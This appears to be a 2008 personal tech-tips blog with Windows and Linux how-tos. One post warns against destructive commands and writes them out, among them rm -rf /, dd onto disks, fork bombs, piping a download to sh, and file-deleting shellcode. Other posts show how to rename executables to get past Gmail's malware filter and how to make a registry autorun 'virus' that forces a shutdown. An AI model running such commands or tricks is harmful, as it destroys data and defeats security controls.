S.Balagurunath: September, 2008

9/30/2008

Anti-Hacker Expert 2008 1.2

Anti-Hacker Expert includes more than 12000 hacker program and trojan signatures. Use manifold scan,fast and reliable detects your computer.
Use the portscan to find open ports for hacker and trojan on your PC, and delete hacker program andtrojan. The registry-scan is highspeed scan for autorun-entries. It scans the system registry by using known trojan filenames. If a trojan is identified by the registry-scan, it will be removed from disk. The memory scan is scan all system process,if found hacker program and trojan, in a minute kill it and delete interrelated file. The diskscan also removes unwanted hacker program and trojan files from your harddisks. This is the most important search method. You can select wheter you want to scan whole drives or specified folders. The Firewall can background-guard watches for active hacker program and trojans while you are working on your PC. We time publish new edition to scan more hacker program and trojan,with Internet Online update to get new edition

http://rapidshare.com/files/101382694/SWAnHac8.rar

pass: Hazzard@SW

8:49 PM | Add a comment | Permalink | Blog it | Computers and Internet

Replace Windows Pics With Your Photo

You can replace your image with the windows in system properties
(1)For that first u have to download ResHack(search for that in Google) from net ,it is arount 120KB software.]
(2)Now open Resource Hacker and then open file C:\windows\system32\sysdm.cpl
(3)then in images went into (1->1033)then replace image with your image(118x113 Size) and then save file in C:\windows\system32\sysdm.cpl and replace the existing one.
and then restart your pc
(4)you will be fing your pic in system properties pan.
(5)Have A Nice Day

8:41 PM | Add a comment | Permalink | Blog it

9/19/2008

Display at startup

Type the below words in a notpad and save the file as Anyname.reg.double click the file.Restart the system.see the difference.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"dontdisplaylastusername"=dword:00000000
"legalnoticecaption"="Hai!!! Have a Nice Day"
"legalnoticetext"="Hai !! Balagurunath!! You are Blessed and have born to Win"
"shutdownwithoutlogon"=dword:00000001
"undockwithoutlogon"=dword:00000001

9:11 PM | Add a comment | Permalink | Blog it | Computers and Internet

9/7/2008

How to get the bios info from windows registry

Go to registry and navigating the values given
below…….HKEY_LOCAL_MACHINE\

HARDWARE\DESCRIPTION\System\SystemBiosDate
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosDate
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\Vid eoBiosVersion
Some information about your BIOS may be in the keys above. Do not
change these values. They are for reference only

You can get more info using the wmic command.Open cmd and type :wmic
bios get /format:list
wmic supports many other alias also, for full list see wmic/

7:24 PM | Add a comment | Permalink | Blog it | Computers and Internet

Folder lock without any software

cls
@ECHO OFF
title Folder Locker
if EXIST recyclebin.{645FF040-5081-101B-9F08-00AA002F954E} goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker recyclebin.{645FF040-5081-101B-9F08-00AA002F954E}
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
ren recyclebin.{645FF040-5081-101B-9F08-00AA002F954E} Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Now paste it in notepad.
Change the "type your password here" with your password (Marked as bold in the above posted matter).
Save it as batch file(with extension .bat).Any name will do.
Now you see a batch file. Double click it to create a folder locker.
A new folder named Locker would be formed at the same location.
Now brings all the files you want to hide in the locker folder.
Now double click the batch file to lock the folder namely Locker.
If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

7:03 PM | Add a comment | Permalink | Blog it | Computers and Internet

Res hack

Resource hacker-Help

               !!! WARNING !!!

       Playing with system files using resource hacker can be
          Dangerous for your system and it can make your
                           system not working.

                     So use it at your own risk!

First of all hi to all "cynides"

So many members hv asked me a lot of questions about Resource Hacker, like:

=> How to replace existing Resources ( Bitmaps, AVI, Icons, etc.) in a file?
=> How to add ur own resources?
=> How to change Menus/ Strings?

and so on...

I was working on this post for the last 1 weak.

So here I'll try to cover all such questions and many other tips-n-tricks.
So here we go.....

NOTE: I hv divided this tutorial in 2 parts:

PART1 : BASIC INFORMATION
PART2 : ADVANCED INFORMATION

Basic part contains Basic details, like viewing/replacing resources, etc.
Advanced part covers some advance information which is described for geeks. Like Adding ur own resources, using scripts with resource hacker, etc.

PART1 : BASIC INFORMATION

What is Resource Hacker:

Resource Hacker is a Free s/w to edit 32-bit windows files (DLL, EXE, CPL, and many other). U can add/delete/view/rename/modify existing resources in a file using this gr8 piece of s/w.

Download Link:

U can d/l Resource Hacker from h**p://delphi.icm.edu.pl/ftp/tools/ResHa

ck.zip
U don't need to install it, simply extract the files and run the s/w. It also doesnt make any entry in Registry!

Using Resource Hacker:

When u open a file in Resource Hacker, it shows various directories in left-side pane, like:

AVI
Cursor
Bitmap
Icon
Menu
Dialog
String Table
Accelerators
Version Info

and so on...
These directories vary from file to file!

continued.....

Following is a small description of these directories:

AVI : This directory contains AVI files.
Cursor : This directory contains Cursor files.
Bitmap : This directory contains Bitmaps.
Icon : This directory contains Icons.
Menu : This directory contains various Menus.
Dialog : This directory contains various Dialog boxes.
String Table : This directory contains various Strings.
Accelerators : This directory contains Shortcut keys.
Version Info : This directory contains version information of the file.

Viewing Resources:

U can view any resource embedded in the file. Simply expand the directory and click on the name of the resource.
Actually each resource contains 3 parts:

Resource Type
Resource Name
Resource Language

Resource Type : Its indicate that the resource is an AVI/Bitmap/Menu
/Cursor/Icon/S

tring/etc.
Resource Name : It describes the name of a resource, no 2 resource can hv the same                            name.
Resource Language : Its the language used in the file. For ENGLISH its 1033.

Changing the Resources:

=> For Icon/Cursor/Bitmap:

1) Select the resource ( e.g. Bitmap -> 131 -> 1033 ).
2) Click on Action -> Replace Icon/Cursor/Bitmap....
3) It'll open a new window, click on Open file with new
    Icon/Cursor/Bitmap button.
4) Select the desired resource in the OPEN dialog box and
    click on Open button and then Replace.

=> For other resources like AVI:

Its a little bit different.

1.) Click on Action -> Replace Other Resource....
2.) It'll open a new window, click on Open file with new resource button.
3.) Select the file and click on Open button.
4.) Now u hv to give the required information for this resource,
     which I mentioned. Its a little bit different.

continued.....

Resource Type
Resource Name
Resource Language

In type give the type of resource, e.g. if u r replacing AVI file then give the type as AVI.
In name give the exact name of the existing resource which u want to replace with this new one.
In language give 1033 for English.

5) And finally click on Replace button.

=> For Menus/Strings/Dialogs:

To change String/Menu/Dialog boxes, Select the desired resource, e.g., String Table -> 4 -> 1033, and make ur changes and then click on Compile Script button. It'll compile the script and will give ERROR if something goes wrong so that u can correct the problem!

Adding ur own Resources:

Adding new Bitmaps/Icons/Cursors/AVIs:

1) Click on Action -> Add a new Resource....
2) Click on Open file with new resource button.
3) Select the desired resource and click on Open button.
4) Give Resource Type/Name/Language.
     (Remember: Resource Name should be different than the
     existing resources.)
5) Click on Add Resource button.

Adding new Menu-items:

U can also add ur own Menu-items, like u can add extra menu (e.g., ur name) in Desktop Context Menu, etc.

1.) Goto desired menu, e.g., Menu -> 215 -> 1033, and add a
   line anywhere inside POPUP "" or something like that in
     following format:

MENUITEM "ur_desired_string", 12345, MFT_STRING, MFS_GRAYED | MFS_DEFAULT

Here:

"ur_desired_string" is the text which will be displayed on screen.
12345 is the the identifier, which must be different than other menuitems.
MFT_STRING describes that its a Menuitem with some text.
MFS_GRAYED disables our menuitem. U can also change it to MFS_ENABLED to enable it.
MFS_HILITE automatically select our menuitem. u can ignore it.
MFS_DEFAULT set our menuitem BOLD. u can also ignore it.

Actually u can only give MENUITEM "ur_desired_string", 12345 and Resource Hacker will automatically add other parts.

continued....

Adding Newly added Resources in Dialog Boxes:

Once u hv added ur own Icons/Bitmaps/AVIs, u may want to add them in dialog box so that they can be displayed when we open some dialog box (like RUN, Progress Dialog box, etc.).

1.) Goto the desired dialog box, in which u want to add ur own
      resource, e.g., Dialog -> 1020 -> 1033.
2.) Right-click on the dialog box and select Insert Control option.
3.) It'll open a new window, where u'll see many controls,
     like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4.) Simply click on the desired control, like to use ur own added
     Bitmap click on the BITMAP control or to use ur own added AVI click on     SysAnimate32 control. U can also add Date/Time control by clicking on     SysDateTimePick32 control.

5.) Don't forget to fill the Caption entry. Actually we hv to enter
      the resource name in Caption so that our added resource can
      be displayed on that place! e.g., if u hv added a Bitmap and
      gave it name as 401, then give 401 in Caption.

PS: For AVI Control ( SysAnimate32 ), u hv to add # before the name in Caption. e.g., if the AVI name 144, then put #144 in Caption

6.) Finally click on OK button & Compile the script.
7.) U can change its position on the dialog box by simply dragging
      it to ur desired position.

continued....

Using Scripts in Resource Hacker:

We can also use Resource Hacker from Command line w/o going thru its GUI and also can automate many repeatative tasks to save our time.[=)]

U can use the scripts in 2 forms:

1.) Single command
2.) Multiple commands

1.) Single Command:

Some useful commands with their format r as follows:

-add ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addskip ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addoverwrite ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-modify ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-extract ExeFileName, ResourceAddress, ResourceType, ResourceName,
-delete ExeFileName, ResultingFileName, ResourceType, ResourceName

Here:

ExeFileName : The original file which we want to edit in Resource Hacker
ResultingFileName : The name which we want to give when we save the file.
ResourceAddress : The resource address (like Bitmap location on our HDD).
ResourceType : The resource type (like Bitmap, AVI, etc.).
ResourceName : Resource name (like 131, 1020, etc.).

EX:- ResHacker.exe -addoverwrite explorer.exe, explorer1.exe, MyImage.bmp , bitmap, 143,

2.) Multiple commands

To use script first u hv to create a script file in notepad and then give following command:

ResHacker.exe -script ScriptFileName

Here: ScriptFileName is the name of the script file which u made in notepad.

continued....

Format of a script file:-

[FILENAMES]
Exe=
SaveAs=
Log=

[COMMANDS]
-addoverwrite ResourceAddress, ResourceType, ResourceName

Here:

EXE= is the original file location
SaveAs= is the saved file location
Log= is the LOG file location which will store the log of the process

In [COMMAND] section, we give the commands which we want to execute.

U can omit the LOG entry, then Resource Hacker will automatically create a LOG file named "ResHacker.log".

Thats all for now guys! I hv tried to cover all points realted to Resource Hacker!
If u hv further queries, pls ask here. I'll try my BEST to answer them.

njoy...!!

6:49 PM | Add a comment | Permalink | Blog it | Computers and Internet

Run shortcuts

Command Prompt
------------------------------

-------------------------------------
ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
ARP - Displays, adds, and removes arp information from network devices.
ASSIGN - Assign a drive letter to an alternate letter.
ASSOC - View the file associations.
AT - Schedule a time to execute commands or programs.
ATMADM - Lists connections and addresses seen by Windows ATM call manager.
ATTRIB - Display and change file attributes.

BATCH - Recovery console command that executes a series of commands in a file.
BACKUP - Enables users to backup their data on their computer.
BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK - Enable / disable CTRL + C feature.

CACLS - View and modify file ACL's.
CALL - Calls a batch file from another batch file.
CD - Changes directories.
CHCP - Supplement the International keyboard and character set information.
CHDIR - Changes directories.
CHKDSK - Check the hard disk drive running FAT for errors.
CHKNTFS - Check the hard disk drive running NTFS for errors.
CHOICE - Specify a listing of multiple options within a batch file.
CLS - Clears the screen.
CMD - Opens the command interpreter.
COLOR - Easily change the foreground and background color of the MS-DOS window.
COMMAND - Opens the command interpreter.
COMP - Compares files.
COMPACT - Compresses and uncompress files.
CONTROL - Open control panel icons from the MS-DOS prompt.
CONVERT - Convert FAT to NTFS.
COPY - Copy one or more files to an alternate location.
CTTY - Change the computers input/output devices.

DATE - View or change the systems date.
DEBUG - Debug utility to create assembly programs to modify hardware settings.
DEFRAG - Re-arrange the hard disk drive to help with loading programs.
DEL - Deletes one or more files.
DELETE - Recovery console command that deletes a file.
DELTREE - Deletes one or more files and/or directories.
DIR - List the contents of one or more directory.
DISABLE - Recovery console command that disables Windows system services or drivers.
DISKCOMP - Compare a disk with another disk.
DISKPART - used to delete and create partitions.
DISKCOPY - Copy the contents of one disk and place them on another disk.
DOSKEY - Command to view and execute commands that have been run in the past.
DOSSHELL - A GUI to help with early MS-DOS users.
DRIVPARM - Enables overwrite of original device drivers.

ECHO - Displays messages and enables and disables echo.
EDIT - View and edit files.
EDLIN - View and edit files.
EMM386 - Load extended Memory Manager.
ENABLE - Recovery console command to enable a disable service or driver.
ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
ERASE - Erase files from computer.
EXIT - Exit from the command interpreter.
EXPAND - Expand a M*cro$oft Windows file back to it's original format.
EXTRACT - Extract files from the M*cro$oft Windows cabinets.

FASTHELP - Displays a listing of MS-DOS commands and information about them.
FC - Compare files.
FDISK - Utility used to create partitions on the hard disk drive.
FIND - Search for text within a file.
FINDSTR - Searches for a string of text within a file.
FIXBOOT - Writes a new boot sector.
FIXMBR - Writes a new boot record to a disk drive.
FOR - Boolean used in batch files.
FORMAT - Command to erase and prepare a disk drive.
FTP - Command to connect and operate on a FTP server.
FTYPE - Displays or modifies file types used in file extension associations.

GOTO - Movesa batch file to a specific label or location.
GRAFTABL - Show extended characters in graphics mode.

HELP - Display a listing of commands and brief explanation.
HOSTNAME -Display the hostname of the machine.

IF - Allows for batch files to perform conditional processing.
IFSHLP.SYS - 32-bit file manager.
IPCONFIG - Network command to view network adapter settings and assigned values.

KEYB - Change layout of keyboard.

LABEL - Change the label of a disk drive.
LH - Load a device driver in to high memory.
LISTSVC - Recovery console command that displays the services and drivers.
LOADFIX - Load a program above the first 64k.
LOADHIGH - Load a device driver in to high memory.
LOCK - Lock the hard disk drive.
LOGON - Recovery console command to list installations and enable administrator login.

MAP - Displays the device name of a drive.
MD - Command to create a new directory.
MEM - Display memory on system.
MKDIR - Command to create a new directory.
MODE - Modify the port or display settings.
MORE - Display one page at a time.
MOVE - Move one or more files from one directory to another directory.
MSAV - Early M*cro$oft Virus scanner.
MSBACKUP -MS-DOS application that enables users to backup their data on their computer.
MSD - Diagnostics utility.
MSCDEX - Utility used to load and provide access to the CD-ROM.
MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
NET - Update, fix, or view the network or network settings
NETSH - Configure dynamic and static network information from MS-DOS.
NETSTAT - Display the TCP/IP network protocol statistics and information.
NLSFUNC - Load country specific information.
NSLOOKUP - Look up an IP address of a domain or host on a network.

PATH - View and modify the computers path location.
PATHPING - View and locate locations of network latency.
PAUSE - Command used in batch files to stop the processing of a command.
PING - Test / send information to another network computer or network device.
POPD - Changes to the directory or network path stored by the pushd command.
POWER - Conserve power with computer portables.
PRINT - Prints data to a printer port.
PROMPT - View and change the MS-DOS prompt.
PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

QBASIC - Open the QBasic.

RD - Removes an empty directory.
REN - Renames a file or directory.
RENAME - Renames a file or directory.
RMDIR - Removes an empty directory.
ROUTE - View and configure windows network route tables.
RUNAS - Enables a user to execute a program on another computer.

SCANDISK - Run the scandisk utility.
SCANREG - Scan registry and recover registry from errors.
SET - Change one variable or string to another.
SETLOCAL - Enables local environments to be changed without affecting anything else.
SETVER - Change MS-DOS version to trick older MS-DOS programs.
SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
SHARE - Installs support for file sharing and locking capabilities.
SHIFT - Changes the position of replaceable parameters in a batch program.
SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
SMARTDRV - Create a disk cache in conventional memory or extended memory.
SORT - Sorts the input and displays the output to the screen.
START - Start a separate window in Windows from the MS-DOS prompt.
SUBST - Substitute a folder on your computer for another drive letter.
SWITCHES - Remove add functions from MS-DOS.
SYS - Transfer system files to disk drive.
SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

TELNET - Telnet to another computer / device from the prompt.
TIME - View or modify the system time.
TITLE - Change the title of their MS-DOS window.
TRACERT - Visually view a network packets route across a network.
TREE - View a visual tree of the hard disk drive.
TYPE - Display the contents of a file.

UNDELETE - Undelete a file that has been deleted.
UNFORMAT - Unformat a hard disk drive.
UNLOCK - Unlock a disk drive.

VER Display - the version information.
VERIFY - Enables or disables the feature to determine if files have been written properly.
VOL - Displays the volume information about the designated drive.

XCOPY - Copy multiple files, directories, and/or drives from one location to another.

6:37 PM | Add a comment | Permalink | Blog it | Computers and Internet

MS-DOS commands

Command Prompt
------------------------------

-------------------------------------
ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
ARP - Displays, adds, and removes arp information from network devices.
ASSIGN - Assign a drive letter to an alternate letter.
ASSOC - View the file associations.
AT - Schedule a time to execute commands or programs.
ATMADM - Lists connections and addresses seen by Windows ATM call manager.
ATTRIB - Display and change file attributes.

BATCH - Recovery console command that executes a series of commands in a file.
BACKUP - Enables users to backup their data on their computer.
BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK - Enable / disable CTRL + C feature.

CACLS - View and modify file ACL's.
CALL - Calls a batch file from another batch file.
CD - Changes directories.
CHCP - Supplement the International keyboard and character set information.
CHDIR - Changes directories.
CHKDSK - Check the hard disk drive running FAT for errors.
CHKNTFS - Check the hard disk drive running NTFS for errors.
CHOICE - Specify a listing of multiple options within a batch file.
CLS - Clears the screen.
CMD - Opens the command interpreter.
COLOR - Easily change the foreground and background color of the MS-DOS window.
COMMAND - Opens the command interpreter.
COMP - Compares files.
COMPACT - Compresses and uncompress files.
CONTROL - Open control panel icons from the MS-DOS prompt.
CONVERT - Convert FAT to NTFS.
COPY - Copy one or more files to an alternate location.
CTTY - Change the computers input/output devices.

DATE - View or change the systems date.
DEBUG - Debug utility to create assembly programs to modify hardware settings.
DEFRAG - Re-arrange the hard disk drive to help with loading programs.
DEL - Deletes one or more files.
DELETE - Recovery console command that deletes a file.
DELTREE - Deletes one or more files and/or directories.
DIR - List the contents of one or more directory.
DISABLE - Recovery console command that disables Windows system services or drivers.
DISKCOMP - Compare a disk with another disk.
DISKPART - used to delete and create partitions.
DISKCOPY - Copy the contents of one disk and place them on another disk.
DOSKEY - Command to view and execute commands that have been run in the past.
DOSSHELL - A GUI to help with early MS-DOS users.
DRIVPARM - Enables overwrite of original device drivers.

ECHO - Displays messages and enables and disables echo.
EDIT - View and edit files.
EDLIN - View and edit files.
EMM386 - Load extended Memory Manager.
ENABLE - Recovery console command to enable a disable service or driver.
ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
ERASE - Erase files from computer.
EXIT - Exit from the command interpreter.
EXPAND - Expand a M*cro$oft Windows file back to it's original format.
EXTRACT - Extract files from the M*cro$oft Windows cabinets.

FASTHELP - Displays a listing of MS-DOS commands and information about them.
FC - Compare files.
FDISK - Utility used to create partitions on the hard disk drive.
FIND - Search for text within a file.
FINDSTR - Searches for a string of text within a file.
FIXBOOT - Writes a new boot sector.
FIXMBR - Writes a new boot record to a disk drive.
FOR - Boolean used in batch files.
FORMAT - Command to erase and prepare a disk drive.
FTP - Command to connect and operate on a FTP server.
FTYPE - Displays or modifies file types used in file extension associations.

GOTO - Movesa batch file to a specific label or location.
GRAFTABL - Show extended characters in graphics mode.

HELP - Display a listing of commands and brief explanation.
HOSTNAME -Display the hostname of the machine.

IF - Allows for batch files to perform conditional processing.
IFSHLP.SYS - 32-bit file manager.
IPCONFIG - Network command to view network adapter settings and assigned values.

KEYB - Change layout of keyboard.

LABEL - Change the label of a disk drive.
LH - Load a device driver in to high memory.
LISTSVC - Recovery console command that displays the services and drivers.
LOADFIX - Load a program above the first 64k.
LOADHIGH - Load a device driver in to high memory.
LOCK - Lock the hard disk drive.
LOGON - Recovery console command to list installations and enable administrator login.

MAP - Displays the device name of a drive.
MD - Command to create a new directory.
MEM - Display memory on system.
MKDIR - Command to create a new directory.
MODE - Modify the port or display settings.
MORE - Display one page at a time.
MOVE - Move one or more files from one directory to another directory.
MSAV - Early M*cro$oft Virus scanner.
MSBACKUP -MS-DOS application that enables users to backup their data on their computer.
MSD - Diagnostics utility.
MSCDEX - Utility used to load and provide access to the CD-ROM.
MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
NET - Update, fix, or view the network or network settings
NETSH - Configure dynamic and static network information from MS-DOS.
NETSTAT - Display the TCP/IP network protocol statistics and information.
NLSFUNC - Load country specific information.
NSLOOKUP - Look up an IP address of a domain or host on a network.

PATH - View and modify the computers path location.
PATHPING - View and locate locations of network latency.
PAUSE - Command used in batch files to stop the processing of a command.
PING - Test / send information to another network computer or network device.
POPD - Changes to the directory or network path stored by the pushd command.
POWER - Conserve power with computer portables.
PRINT - Prints data to a printer port.
PROMPT - View and change the MS-DOS prompt.
PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

QBASIC - Open the QBasic.

RD - Removes an empty directory.
REN - Renames a file or directory.
RENAME - Renames a file or directory.
RMDIR - Removes an empty directory.
ROUTE - View and configure windows network route tables.
RUNAS - Enables a user to execute a program on another computer.

SCANDISK - Run the scandisk utility.
SCANREG - Scan registry and recover registry from errors.
SET - Change one variable or string to another.
SETLOCAL - Enables local environments to be changed without affecting anything else.
SETVER - Change MS-DOS version to trick older MS-DOS programs.
SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
SHARE - Installs support for file sharing and locking capabilities.
SHIFT - Changes the position of replaceable parameters in a batch program.
SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
SMARTDRV - Create a disk cache in conventional memory or extended memory.
SORT - Sorts the input and displays the output to the screen.
START - Start a separate window in Windows from the MS-DOS prompt.
SUBST - Substitute a folder on your computer for another drive letter.
SWITCHES - Remove add functions from MS-DOS.
SYS - Transfer system files to disk drive.
SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

TELNET - Telnet to another computer / device from the prompt.
TIME - View or modify the system time.
TITLE - Change the title of their MS-DOS window.
TRACERT - Visually view a network packets route across a network.
TREE - View a visual tree of the hard disk drive.
TYPE - Display the contents of a file.

UNDELETE - Undelete a file that has been deleted.
UNFORMAT - Unformat a hard disk drive.
UNLOCK - Unlock a disk drive.

VER Display - the version information.
VERIFY - Enables or disables the feature to determine if files have been written properly.
VOL - Displays the volume information about the designated drive.

XCOPY - Copy multiple files, directories, and/or drives from one location to another.

6:34 PM | Add a comment | Permalink | Blog it | Computers and Internet

Malicious Commands Ubuntu / Linux Bad / Harmful / Risky Commands

As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

Code:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)

Code:

:(){:|:&};:

In Perl

Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust

Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
               = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

                 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

                 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                 "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:

Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

6:30 PM | Add a comment | Permalink | Blog it | Linux

Get Youtube Video in FLV format at Firefox cache folder without download

Just watch youtube video in firefox and get FLV file of that video in cache folder of firefox in easy way. No need to download youtube video from other websites.

Here is the step by step process.

1. Watch full Youtube video in Firefox bowser.
2. When you see reply button on youtube video, don't close the Firefox browser.
3. Go at following folder D:(or C:)\Documents and Settings\ADMIN (your Admin login)\Local Settings\Application Data\Mozilla\Firefox\Profiles (one by one),
4. Click single folder there you will get folder "Cache". click on it. You will find a lots of unknown type files in this folder.
5. Most probably the last file will be youtube video.
6. Remember, youtube video in FLV format in this folder is there with unknown name ant type.
7. You can arrange all files in this folder by size. largest file should be youtube video
8. Copy that file, paste it on desktop
9. Rename it with FLV extension, something like video1.flv.
10. Play the video with FLV player.

6:28 PM | Add a comment | Permalink | Blog it | Computers and Internet

Send Out Executable Files Via Gmail

As a security measure to prevent the intrusion of potential viruses, Gmail strictly disallows users to send and receive executable files (files with the extension ".exe", ".dll", ".ocx" or ".bat") in its policy. If you try to send these files, Gmail will send you an error message: "This is an executable file. For security reasons, Gmail does not allow you to send this type of file." You might try to zip or compress the files into other formats such as ".zip", ".tar", ".tgz", ".taz", ".z" or ".gz". However, your Gmail account will bounce back your message. How to send executable files with your Gmail account if you really need to do so?Of course the easiest way is to use other email services such as Yahoo to send your important executable files. However, if you are still set on using Gmail to send your executable files, there are a few ways you can try: -
1. You can rename your executable files from the "exe" extension to other formats such as "doc", "jpeg", etc. For instance, your file name is happy.exe; just rename your file to happy.doc and send it over to the receivers. Once the receivers have received the files, they just need to change the extension back to the original file extension.
2. The other way you can try is upload your executable files to some free file hosting service such as DivShare or Rapidshare. Copy down the link and send it to the receivers. It's pretty straightforward.
3. The last option you can try is to compress your executable file by using Winrar. Gmails doesn't scan files in the RAR format. You can send the file out without a problem. However, you must make sure your receivers can open the RAR files.

6:26 PM | Add a comment | Permalink | Blog it | Computers and Internet

Create A Simple Virus Via Registry

Let's follow the instruction below to create a virus and I give the troubleshooting too to troubleshoot the virus effect.
Here comes virus:
1. Click Start -> Run.
2. Type regedit. Now ENTER.
3. Go To HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\Curr entVersion\Run.
4. Click on Edit Menu > New > Expanded string value

5. Name the String value as "Shell32".
6. Now, Double click on it to and Set its value as
%windir%\system32\shutdown.exe -s -t 100 -c "BACK TO MASJID, BACK TO ISLAM"

7. Restart your PC to see the effects……….

After Restarting, See the effects…
To abort the effects:
1. You can go to START -> RUN, Type shutdown -a
2. Go to registry Menu (Point.3) and You can delete the registry you create. Happy Infecting and Good trying for Troubleshooting

4:29 PM | Add a comment | Permalink | Blog it | Computers and Internet

9/4/2008

How to write protect Pendrive?

It happens with me many time that I had to copy some files from my pen drive to our college lab and the moment I plugged in my pen drive, it gets infected with dozens of viruses. Yes, its true that our college labs are too infected. Now before I can use the pen drive again, I need to make sure to clean it first so that the virus may not spread on more computers. I scan for my pen drive using NOD32 and no doubt it completely remove all traces of virus but it wastes my time as I always have over 2 GB of files that I carry with me all the time.

So I came to know of this trick of write protecting the drive so that I can safely copy things I want without the worry of virus being copied on my USB drive. Although you won't be able to write any thing on your pen drive, its still very useful in case you want something to copy from your pen drive and don't want to get infected. Before proceeding I must tell you that playing with the registry can be harmful for your Operating System (OS) and I advise you to take a backup of your registry in case anything goes wrong. Read how to Backup Windows Registry.

This trick works only on XP SP2 and you need to have administrator privileges.

Open Registry Editor by Start > Run.
Type in regedit.
